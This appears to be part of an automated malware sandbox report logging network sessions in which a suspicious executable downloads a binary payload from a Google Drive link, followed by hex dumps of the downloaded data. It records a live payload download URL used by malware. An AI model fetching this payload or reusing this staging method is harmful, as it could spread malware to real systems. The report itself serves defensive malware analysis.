                                                                                                                                                                                                Data Raw: 31 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 52 c1 6e 13 31 10 bd f7 2b 8c 11 12 48 bb eb 4d ab 4a 68 b3 bb a8 0a 29 07 22 b5 aa c2 a1 27 e4 d8 26 eb 76 6d af ec 49 d2 50 55 e2 c2 5f 70 ab 8a b8 f4 ce a5 3f 53 51 c4 67 60 af 43 8b 2a f0 c5 7e 33 e3 f7 9e c7 53 3e 79 7d 30 9a 1e 1f 8e 51 03 aa ad b7 ca 3f 9b a0 dc 23 c7 ac ec 00 b1 86 5a 27 a0 c2 ef a6 fb e9 4b 8c 24 af f0 64 ef fd e8 60 32 19 8f a6 18 39 cb 2a 4c 88 e3 a7 d9 ee 20 6b 29 39 71 a9 07 69 67 4d a6 a4 ce 4e 1c ae 4b 12 c9 ee 59 eb c9 5e 26 b5 84 e7 e7 92 17 f8 ed 78 be 86 23 da 6e 2f f6 cd 0e 6c bf c1 09 3b fd 47 f4 e2 c5 03 0f 2a 95 00 fa d8 5c bd 85 fc 8a a9 e0 73 29 c5 aa 33 16 30 d2 54 89 bf 31 33 1a 84 f6 af 5a 49 0e 4d c5 c5 52 32 91 f6 20 f1 ae a5 5a a8 d4 31 da 8a 6a 90 e5 89 a2 67 8f 22 0b 27 6c 5f 40 67 be 46 1b ec a5 a3 38 48 68 45 fd f3 fa f2 ee cb b7 5f 37 37 77 9f af 7e 7c bf be fd f4 b5 24 31 13 ab 1c ac 7d 55 7f 0e 2b 74 3e 99 19 be 4e e4 07 eb ad 9e f7 4e 0a 34 c8 f3 67 c3 46 c8 79 03 1b d0 51 ce a5 9e 17 28 1f 2a 6a e7 52 fb d3 c5 3d cf d3 95 a5 dd ff 2f 3f 14 6e 64 66 c6 72 61 0b a4 8d 16 c3 98 f5 3d 8e de 4a d2 c4 41 08 be fc cf 71 b9 ec 3f 3f 48 84 e7 86 4e 47 9a 38 03 0d 40 e7 0a 42 f8 d9 5a c1 c7 7c 27 63 8c b0 8e e5 bb e4 95 9f 21 ad 45 3b 32 5c 54 7d 28 8c 44 bc eb 89 89 67 0e db 46 87 f4 63 f8 1b 64 53 ca f5 9d 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1b7uRn1+HMJh)"'&vmIPU_p?SQg`C*~3S>y}0Q?#Z'K$d`29*L k)9qigMNKY^&x#n/l;G*\s)30T13ZIMR2 Z1jg"'l_@gF8HhE_77w~|$1}U+t>NN4gFyQ(*jR=/?ndfra=JAq??HNG8@BZ|'c!E;2\T}(DgFcdS0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                0192.168.11.2050127142.250.176.206443C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                2023-11-17 18:25:34 UTC0OUTGET /uc?export=download&id=15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5 HTTP/1.1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                2023-11-17 18:25:35 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:25:35 GMT
                                                                                                                                                                                                Location: https://doc-08-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdjt93c9f8d0n714cnia796q3u/1700245500000/07385957382368565097/*/15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5?e=download&uuid=7c0286c5-d7f7-44f9-bef7-ac2965bbc2b0
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                Content-Security-Policy: script-src 'nonce-yIhzaenEaIdkg8F1wjP4Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                Server: ESF
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                0142.250.176.206443192.168.11.2050127C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                2023-11-17 18:25:34 UTC0OUTGET /uc?export=download&id=15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5 HTTP/1.1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                2023-11-17 18:25:35 UTC0INHTTP/1.1 303 See Other
                                                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:25:35 GMT
                                                                                                                                                                                                Location: https://doc-08-18-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdjt93c9f8d0n714cnia796q3u/1700245500000/07385957382368565097/*/15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5?e=download&uuid=7c0286c5-d7f7-44f9-bef7-ac2965bbc2b0
                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                Content-Security-Policy: script-src 'nonce-yIhzaenEaIdkg8F1wjP4Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                Server: ESF
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1142.250.81.225443192.168.11.2050128C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                2023-11-17 18:25:35 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/akjdvekdjt93c9f8d0n714cnia796q3u/1700245500000/07385957382368565097/*/15oDBUcwjnps0SIy7xJNJoKORP-vQHwY5?e=download&uuid=7c0286c5-d7f7-44f9-bef7-ac2965bbc2b0 HTTP/1.1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Host: doc-08-18-docs.googleusercontent.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2023-11-17 18:25:36 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                X-GUploader-UploadID: ABPtcPr2flMhgk32qsu5Dc3FZ-6p_Sb2hWiv66rt7oHlcN1zOgYRGGFJPv5kgcAC_0j3HBGQE_BEPZ64U4-l_J0IdvuAIQ
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                Content-Disposition: attachment; filename="TsrbknfwcShd174.bin"; filename*=UTF-8''TsrbknfwcShd174.bin
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 249920
                                                                                                                                                                                                Last-Modified: Fri, 17 Nov 2023 10:01:16 GMT
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:25:36 GMT
                                                                                                                                                                                                Expires: Fri, 17 Nov 2023 18:25:36 GMT
                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                X-Goog-Hash: crc32c=vcTF/A==
                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                2023-11-17 18:25:36 UTC6INData Raw: 5c 9e 7a ae ef 41 2a 14 33 ec dd ea a1 b4 64 c4 1b 61 15 f6 c8 42 c6 1b b6 c5 3e a9 2b d4 49 b6 92 e9 f9 a3 f5 81 15 f7 37 e1 bd 64 20 ef d5 db 53 19 c6 d1 bc 27 7d 6b 10 98 fe 6e 05 1f e9 d3 ab ee 69 3e 02 2b 66 81 4d 10 80 2d 9f bb 4c d8 62 14 7c 6c e0 d2 81 c3 f7 59 47 37 5b ed 77 9c fa 92 c5 e2 16 50 0e 65 b7 a9 8b 60 e6 3a ef d8 3f 97 a9 42 db 6a be 5d ad 8a 97 cf e5 8f ba 6b 25 df 9d 09 91 f1 d8 91 7d f8 f1 e5 4b ce fb 0d 21 4d ba a3 28 c0 de 6d b3 2c 62 88 a8 8a 81 3c 87 36 ad f8 dd 0a fb f7 a9 fb f6 b6 d2 e9 b8 fc e7 75 e7 f5 b8 c4 b7 a8 66 cc 17 e5 7d 58 04 60 58 9b 80 d1 9b 9c 3d 26 c0 db 5f 45 87 6a 3e 14 b9 03 50 36 1a e3 76 99 77 17 4e 1e 7e 54 bb 60 99 45 e0 2a c3 14 28 10 08 7c 41 38 0d df 34 4a 81 60 a1 32 e3 34 a7 e2 8e 5a 0c 58 cf 68 6e
                                                                                                                                                                                                Data Ascii: \zA*3daB>+I7d S'}kni>+fM-Lb|lYG7[wPe`:?Bj]k%}K!M(m,b<6uf}X`X=&_Ej>P6vwN~T`E*(|A84J`24ZXhn
                                                                                                                                                                                                2023-11-17 18:25:36 UTC10INData Raw: 96 d4 68 bb 1f 82 44 bc dd 54 99 8c 07 9e aa 58 ce 8b 38 e9 47 2e 32 10 fe 42 b6 5e f5 0c 3f 41 65 94 d5 c5 28 29 4e 50 3c c3 6d 87 f2 e6 d4 b9 df 5c 17 f4 e6 4f a8 8b 9d 3b 03 45 a8 63 31 ab e7 a6 54 98 2d 2c af 61 fa 24 8b ab e9 c1 c3 0f 25 3e b9 83 88 95 57 18 91 ae df b1 d4 3b b3 1e 61 b1 90 75 58 6c ef b0 9f 0d 96 c7 7a 5d 6e af a4 7b ac 24 63 05 ec a0 ac 71 a3 3a 1b ac ff 16 f6 48 e7 b0 00 92 42 17 99 0b 3b 39 49 b4 4a af d0 cb e1 94 fb 2c 57 dc b5 32 27 35 fd b8 c4 6e a2 d4 29 b6 5e bd a8 3e 0f cc 0c 45 f4 4a 66 a0 b9 35 18 5e fa e8 98 62 3d 10 e7 b2 db 5f 99 af fd 2e a7 0f a5 8d d4 d0 9d 47 2a 42 21 b6 0a 5d e6 a1 9c f7 10 b2 73 38 69 67 0a c6 71 f9 cc 23 7c aa b9 0f aa 42 08 6f 44 1a de 7b ee f0 6d 85 7c ab 5d 66 dd 0c d9 15 68 ed 58 f4 69 68 ec
                                                                                                                                                                                                Data Ascii: hDTX8G.2B^?Ae()NP<m\O;Ec1T-,a$%>W;auXlz]n{$cq:HB;9IJ,W2'5n)^>EJf5^b=_.G*B!]s8igq#|BoD{m|]fhXih
                                                                                                                                                                                                2023-11-17 18:25:36 UTC15INData Raw: da fc 1f 5d 84 49 6c bd 99 bb 5f 14 a5 9c 16 8b 47 ee 1c 25 89 5e 15 45 ee 37 88 a1 71 14 59 c3 fe d6 a1 6f 35 4a 8a fc a6 a1 03 5e 47 c2 ba 33 11 11 e5 80 e8 53 fe 37 51 04 7d f9 b7 1c a8 fe 58 d3 f1 84 07 67 ca e9 51 e1 0b 05 5e f2 17 ce 9d bf 50 e2 f8 30 6b 8c 69 63 fe b3 af e5 ab 24 1d ef 01 01 37 e4 bf 5d f1 e2 9d 26 d2 48 b8 a5 5c 5d cf c0 3e 06 a3 f7 83 ac a6 0a 5f b6 30 94 4b 34 e0 b0 c8 56 86 50 0a bd c4 ed 9a 99 76 b1 91 ed fe f6 b5 17 1d 63 39 c8 04 37 16 27 1c 71 89 98 c5 ac 05 06 89 99 e1 ff 5a 8d f1 80 70 ba 91 36 f0 68 85 5c 59 38 c4 10 3f 6a bf 0e ea 48 00 6c 0b 69 67 99 a6 7e 29 0a 53 92 0f 3b 45 ff 20 76 5f ea eb 14 83 8d db 90 11 6d 33 16 10 11 0e 99 29 04 bf 14 3d 68 e6 cf 7c 33 82 70 cf 0b f1 56 03 af 5b fb 1c b4 f7 c2 e0 6d f4 9a 4f
                                                                                                                                                                                                Data Ascii: ]Il_G%^E7qYo5J^G3S7Q}XgQ^P0kic$7]&H\]>_0K4VPvc97'qZp6h\Y8?jHlig~)S;E v_m3)=h|3pV[mO
                                                                                                                                                                                                2023-11-17 18:25:36 UTC18INData Raw: fd 9f bf 49 f8 53 04 40 b5 47 0e 83 52 fc 0a 83 dc 71 9d bf a8 e5 ee e9 78 24 64 8b cd 55 99 5b cb a8 43 57 3d 95 1d 2f f4 4f 86 d7 3b 25 b7 60 5a 07 24 50 d2 d2 38 bb 97 e5 a8 c6 e4 87 13 cb c9 bf bb 7b 3c 86 36 dd 1a 67 5f e3 14 c7 90 c3 fa e0 bd de 7f 24 1e b6 08 71 e4 61 2b 31 be ca 23 91 7b c7 59 06 78 5a 7e 66 2a 89 75 4c 11 dc 6e 8b da 38 14 5e 57 71 a6 c5 a1 c7 24 45 ce af b5 48 26 87 75 0f 73 fa f8 04 fd f2 48 33 b3 dc 3b 69 5a 43 26 4a 36 14 7e ee 07 0b b9 e6 93 87 8f b3 e0 28 3c 37 4d f2 9d c1 ed 5a 16 1d 86 b1 61 bc 1d 62 55 88 ca 90 54 93 09 63 24 ed 5c d2 3c 33 a4 f6 72 e7 70 f1 73 b5 64 c0 1e ff d6 c3 a2 e8 02 9f dc 8c 5d 36 b0 f4 cf 4d e6 b6 24 c7 ef 1f 07 5b 99 ab 8f 88 16 77 29 a5 b3 ab 9a 4c 35 96 80 b8 70 ac ac 6a fc 2e 91 0f 8a d7 5e
                                                                                                                                                                                                Data Ascii: IS@GRqx$dU[CW=/O;%`Z$P8{<6g_$qa+1#{YxZ~f*uLn8^Wq$EH&usH3;iZC&J6~(<7MZabUTc$\<3rpsd]6M$[w)L5pj.^
                                                                                                                                                                                                2023-11-17 18:25:36 UTC19INData Raw: 71 e8 76 a6 05 6b 93 5c d0 f1 e8 c4 7e 5c 4d 97 df 2e 96 29 20 e4 57 46 31 cc b2 05 f0 e5 9e 13 8a a8 b4 14 ba 63 31 02 a2 4f 36 f5 e4 68 46 32 07 cb 11 ed eb dd d9 2f 81 82 84 bd d1 64 4f 30 38 b8 6f e5 1b 5b 41 56 67 ad 45 76 68 fd 31 10 7a d9 0d 72 39 79 39 d2 3f 5b e4 a2 30 46 2d cc a6 cf 18 5e 2c b0 42 f0 e8 32 6e 3c 60 85 6a 2a d4 66 90 6f a6 d0 4d 7c 24 e4 5b 03 b8 54 9f 14 3c 23 46 c4 fc 48 fa d3 9f db 9c cb 35 2a 30 3b 90 eb 5f c5 94 c4 a7 94 7f cb 61 fd 14 10 dc 1a 67 62 1f 41 a6 98 0b d6 51 e9 be 8b cc 50 28 1a 22 a9 a4 ff b3 c5 07 e1 9d 4e 96 00 63 ab fa 2c d7 6e ef 3a 9e 3d 7b 05 ff 1d 23 5f 9d 85 3b 90 53 d4 e4 27 f8 64 17 2b 61 68 f2 d4 9d 64 20 8f 9e 2d fc a4 06 ce da 8b 1d d2 5d bf bf c5 eb 0e 4e ec b3 76 90 74 d5 c7 e1 96 05 54 08 61 52
                                                                                                                                                                                                Data Ascii: qvk\~\M.) WF1c1O6hF2/dO08o[AVgEvh1zr9y9?[0F-^,B2n<`j*foM|$[T<#FH5*0;_agbAQP("Nc,n:={#_;S'd+ahd -]NvtTaR
                                                                                                                                                                                                2023-11-17 18:25:36 UTC20INData Raw: 33 b0 8b 53 00 52 a7 62 0d 95 ca 7a e8 32 f8 8a 79 a1 28 9b 46 40 1b 3a 7f f4 6c 2e a5 af 67 d4 2e 98 35 5c da 37 db 66 8b 13 e6 8f bd 4b fa 8f 7d 23 0f 72 98 3c c4 a5 ee 92 51 dd e9 fe 8f 6a d9 95 e0 57 2b 8b 33 22 8b 36 85 75 42 15 76 1b 97 20 f8 9b c8 a0 b0 8a 43 7f 58 e1 48 23 8b 92 79 79 92 9a 5e 56 2e e9 31 98 64 c7 0c 6b b9 3b c5 19 51 2e 07 20 90 32 c5 da b9 69 ef 8f 61 b7 15 de 95 06 95 90 0c b0 60 f5 82 7d 8d aa 16 dc c4 a7 0f a6 6c af bd be e7 6b b1 30 c3 66 69 45 a9 0e c8 71 0c 0e 4e 5d 3b 0f 55 a5 26 2e 69 5c 9d b4 ab f6 3a b2 50 6f 25 f7 42 4f 0d ca 7f ff 58 87 a9 8f 27 25 c0 76 64 66 96 9c 8b 35 98 7d c4 a0 d2 31 9c da 56 69 8e 10 26 04 c2 1b d3 3c f8 e3 3c 61 d6 a9 e6 ef 9d e3 b8 27 bc f2 fa 58 0f 45 5d 55 1c eb cd 4c 54 40 66 ad 64 c1 bb
                                                                                                                                                                                                Data Ascii: 3SRbz2y(F@:l.g.5\7fK}#r<QjW+3"6uBv CXH#yy^V.1dk;Q. 2ia`}lk0fiEqN];U&.i\:Po%BOX'%vdf5}1Vi&<<a'XE]ULT@fd
                                                                                                                                                                                                2023-11-17 18:25:36 UTC21INData Raw: 2f e5 a5 25 53 24 4b 0a 0c 79 7a d2 2e 5b 01 4a 61 9c 46 58 d5 71 df bb 57 21 c7 99 fe f7 bd 84 89 39 c8 72 a0 aa 62 9a c6 87 cd 9b c4 a8 fc aa 99 b7 11 e8 aa 1d 16 f9 1e 8d da bd 5e 8e 25 2a 42 77 0f 96 b4 ef d4 5b 69 b4 61 98 91 b4 5a 28 6e 12 e8 1e 38 5e 8d 0c cf 96 6f f0 cf 67 44 26 21 55 0a 31 6d b9 1f 7b be e2 bb e9 e9 98 b5 ca 40 dc 60 7b 30 35 29 11 4d 23 48 4e 1d a4 2f 77 d3 6b e5 a0 bc 26 41 78 3f 17 e8 a8 7e 4c b0 f4 59 a1 b7 9e f6 e0 12 ec 52 14 d7 b2 08 8e e2 b2 60 ce 08 32 95 69 c3 57 28 6b c5 d1 5f 13 92 e4 d7 eb d7 ad b8 f7 27 b3 39 00 03 05 01 78 a7 91 b2 a3 db 35 73 57 0d 51 2e e7 3a 50 9e 41 e0 55 ed 52 48 93 30 46 3e b2 e0 e7 1f a3 be c6 fd 65 9a fd 28 7a 3f 00 64 a8 b7 24 27 09 d6 28 0d a0 8c 54 03 f9 51 df 3a 34 e0 6d ca d2 4d a8 2f
                                                                                                                                                                                                Data Ascii: /%S$Kyz.[JaFXqW!9rb^%*Bw[iaZ(n8^ogD&!U1m{@`{05)M#HN/wk&Ax?~LYR`2iW(k_'9x5sWQ.:PAURH0F>e(z?d$'(TQ:4mM/
                                                                                                                                                                                                2023-11-17 18:25:36 UTC22INData Raw: 6f a6 f9 82 e0 70 d4 2c 39 a5 d6 f0 1e 18 f4 a4 05 cb 1f 17 45 3c 70 41 4f 01 f3 72 d2 94 d6 04 5a a2 8d 8a 4c d3 84 77 03 eb c2 37 4a 03 13 9e 95 fe 66 65 b3 8b 5c 1e 04 e9 37 e7 08 d1 2a 97 49 04 56 da b2 2a 91 bc 9d f1 99 39 a3 71 29 10 bc 53 71 9d 10 72 a1 ea a1 ec f1 4d 1e 73 2e c0 48 f6 8e 72 1f b2 64 18 4a 73 8a b2 0b 32 d5 ba 32 68 5e 33 74 8f e8 4e 0d a8 71 e8 37 4e c0 62 c7 4e 8b d4 58 6b f3 f9 bc 4b dd be 22 f6 34 3b 3b 61 ef 52 2a 77 42 8f 68 92 16 54 28 13 aa 02 48 2c 9d 91 6c 22 51 1f fa a8 03 8c 70 63 37 a6 b6 34 b1 e5 be 0e 5a ff 1e df de 0f 19 b2 2f 7b 28 08 41 11 8f bd e9 12 96 a4 5d 39 36 b3 8b 23 c5 d1 ce 5a f7 c1 a4 5c 3b be ef 93 34 d9 fb 92 4e 10 c3 1e 01 5b cd 1e 25 9b 1f ca ce 76 14 ae b7 a7 8a f1 06 c8 23 84 88 69 4b 6e 86 6a fa
                                                                                                                                                                                                Data Ascii: op,9E<pAOrZLw7Jfe\7*IV*9q)SqrMs.HrdJs22h^3tNq7NbNXkK"4;;aR*wBhT(H,l"Qpc74Z/{(A]96#Z\;4N[%v#iKnj
                                                                                                                                                                                                2023-11-17 18:25:36 UTC24INData Raw: 6f 24 7d 93 eb 01 4f b2 0c 2f 14 5f 4d ac ec a8 e7 1b 7b 1f d0 a1 aa e1 71 a8 48 44 d3 3d 1f fa f9 51 64 78 d1 35 e7 46 2f bd 64 55 fb a6 9f 2f e1 7c c0 7c 9a 2e 29 b6 34 54 c1 89 59 cf 94 94 df 44 36 e0 04 bd 6e b6 68 83 22 c0 75 68 3d bf 5f 2c a3 83 bb 6a 14 ab 3d 90 b8 1d 20 bb 9c f5 b6 09 e1 9b d0 15 30 ae 5f f3 c9 0a 64 91 d1 c5 3c ce 00 e1 12 55 60 cd bd 9b 36 64 42 b0 93 a8 d5 a6 f2 eb c4 28 d6 c1 95 88 17 31 b2 84 c8 d6 6d 3a 49 b6 c9 92 b9 0d c8 2e 15 be 4b bf f4 eb 53 ca e4 ef 38 da d2 99 80 d1 e0 79 58 c7 1c 2f 5b af fb b0 78 ad db 9f 9b 47 78 5a 58 3b 6c 82 6d 5e 60 49 90 cc 4c 0c be 00 42 4f 80 4d ef fd 84 3c dd e1 8d 41 b7 89 ad d1 6e d7 3a 51 1e 50 cf 66 c2 b0 6e 17 06 a6 3d 90 43 c2 98 7b a6 9c b5 cf ec 4b 81 0b 48 78 11 ab 9b 7e 70 a1 b7
                                                                                                                                                                                                Data Ascii: o$}O/_M{qHD=Qdx5F/dU/||.)4TYD6nh"uh=_,j= 0_d<U`6dB(1m:I.KS8yX/[xGxZX;lm^`ILBOM<An:QPfn=C{KHx~p
